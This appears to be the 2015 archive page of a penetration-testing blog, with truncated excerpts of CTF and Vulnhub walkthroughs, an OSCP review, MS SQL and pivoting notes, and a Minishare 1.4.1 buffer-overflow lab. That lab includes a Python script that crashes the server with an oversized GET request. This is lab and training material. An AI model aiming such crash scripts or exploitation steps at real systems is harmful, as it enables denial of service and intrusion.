Showing posts from 2015

CTF Hack Dat Kiwi Writeups

I participated in the Hack Dat Kiwi CTF, held on 19th and 20th November 2015. The CTF was organized by Abius X. Let me tell you, this was one of the finest CTFs that I've ever participated in.
Everything was awesome and organised.

I solved a few challenges and was ranked 234th: http://hack.dat.kiwi/scoreboard (Handle: Transformers)


SSL_Sniff 1 (50 points): A Wireshark capture file (dump.pcap) was given; it can be found at
https://www.dropbox.com/s/85f7kipys931m8n/dump.pcap?dl=0


MY OSCP REVIEW

About me: I am just a guy who has done a B.E. (Computer Engineering) and C.E.H., and I am doing vulnerability assessments for different clients in Mumbai.

Inspiration to do OSCP: If you want to read the technical stuff only, then skip this paragraph. Like other guys, I thought that OSCP is one of the most difficult tasks in the world of IT security.
And yes, it is one of the difficult missions you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing; I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and there was little time to complete the task.
So I asked a few questions in a Facebook group about how I could learn more exploitation stuff.
There was a guy with the name Mr.WhiteW0rm who gave me a brilliant answer and recommended that I do OSCP. At that time I thought that though I wouldn't be able to do OSCP, at least I'll study in i…

Walkthrough Tr0ll 2 VM (Vulnhub)

Tr0ll 2 vulnerable VM walkthrough.

1) Nmap scan:


EchoServer (Strcpy) bufferoverflow Securitytube Exploit research Megaprimer

This blog is all about Exploit Research Video #3 from Pentester Academy/SecurityTube. The Exploit Research Megaprimer can be found at http://www.securitytube.net/groups?operation=view&groupId=7

Here I will be demonstrating a buffer overflow on a strcpy or echo server that is written in the C programming language by Vivek Ramachandran.

All you need to do is double click on the Server-strcpy.exe file to run the server.

Configuration/Setup:

Whitehat Wargame websecurity challenges

Walkthrough of some Web security challenges that are present at Whitehat wargame
https://wargame.whitehat.vn/Challenges/List/2

Note: It is the walkthrough of challenge that is present not at the above link.
It is not a CTF
WebSecurity Challenge Web001


Pentester Academy Command Injection ISO basilic 1.5.14 exploit

Pentester Academy has launched a Command Injection ISO, a virtual image of Ubuntu with lots of real-world vulnerable application frameworks.

Refer to the following links for download and information:
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12

Lab setup:
1) Kali Linux (Bridged or NAT). My Kali Linux IP was 192.168.1.102
2) Command Injection ISO (Bridged or NAT). My target IP was 192.168.1.103

Log in to the Command Injection ISO with user name securitytube and password 123321 to check the DHCP-allocated IP address, or simply do a ping scan (nmap -sn).

Checking port 80 on the Command Injection ISO (192.168.1.103)


Minishare 1.4.1 Bufferoverflow

You can download the server from:
https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

Exploit code in ruby:
https://www.exploit-db.com/exploits/616/

The vulnerability is triggered by a long URL in the GET request.
E.g.: GET AAAAAAAAAAAAAAAA..... HTTP/1.1

Lab Setup:
1) Windows XP (I am using Windows XP SP1).
2) Immunity Debugger installed on the Windows XP machine.
3) Minishare 1.4.1 installed on Windows XP, running on port 80.
4) Kali Linux for scripting and exploiting.

Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below.


Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script.

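#!/usr/bin/env python
# Sends a GET request with a 2000-byte URL to the MiniShare server given as argv[1]
import socket, sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
# Byte strings so the script runs unchanged on Python 2 and Python 3
buff = b"GET "
buff += b"A" * 2000
buff += b" HTTP/1.1\r\n\r\n"
s.sendall(buff)
s.close()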


Execute the exploit. It is observed t…

MS SQL Pentest

In a few of my internal pentest engagements I was able to enumerate the IP and credentials of database servers, either by brute-forcing or by searching the code for the database connect string.

In the last 6 months I got the database credentials twice in client-side code, excluding the successful brute-force.

Previously, when I used to get the credentials, I would try to connect to the server using a local client. E.g., if I got credentials of an MS SQL Server, I would download some client for it and try to view the database.

This time I was not really interested in doing that. Instead I was thinking of escalating my privileges and doing something more than just viewing the database, because when I was reading the walk-through of Kioptrix, it stated that we can gain code execution using some commands executed in SQL format.

So I googled ways to enumerate MSSQL and I got a very good link: https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/



Port forwarding and pivoting

"This blog is already published on infosecinstitute"


In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most commonly used to make services on a host residing on a protected or masqueraded (internal) network available to hosts on the opposite side of the gateway (external network), by remapping the destination IP address and port number of the communication to an internal host.

More info on Port forwarding

Lab Setup: Requirement
        Three machines
        1 - Attacker (Kali)
        2 - WinXP
        3 - Linux (Metasploitable or any vulnerable Linux Machine).

Vmware IP Setup
Attacker
        eth0 - (C Class IP) eg. 192.168.1.104
WinXP
        1 Ethernet - (C Class IP) e.g. 192.168.1.131
        2 Ethernet - (A Class IP) e…

De-Ice 1.20b Walkthrough

Well, 15 days back I wrote a walk-through of De-Ice 1.120a on my blog. I got a great response from VulnHub and they published my walk-through: https://www.vulnhub.com/author/trnform3r,152/
With such warm encouragement I feel like writing more walk-throughs.

Here is my walk-through of De-Ice 1.20b. You can download the VM and get more info about it from here.

Note: The attacker machine and the VM should be in the subnet of 192.168.1.0/24

Lab setup:
1 - Open VMware -> Edit -> "Virtual Network Editor"
2 - Click on "Add Network" and add any one network, for example VMnet2
3 - Select VMnet2 and change Subnet IP to 192.168.1.0 and Subnet mask to 255.255.255.0; also select "Host-only"
4 - Now add this adapter (VMnet2) to both machines.

When you start the VM it looks something like this.



De-Ice 1.120a Walkthrough

A few days back my friend Chetan told me to get hands-on with the De-Ice and Kioptrix series before taking the PWK labs. The very next weekend I started with De-Ice http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso . As my bridged network was on the 192.168.1.x series, I thought of doing De-Ice 1.120a just by bridging the VM. One of the awesome URLs that I found today was https://blog.g0tmi1k.com/2011/03/vulnerable-by-design/ .
Enumeration: I started with nmap as usual to find all the open ports. I usually use version detection and aggressive scan in nmap.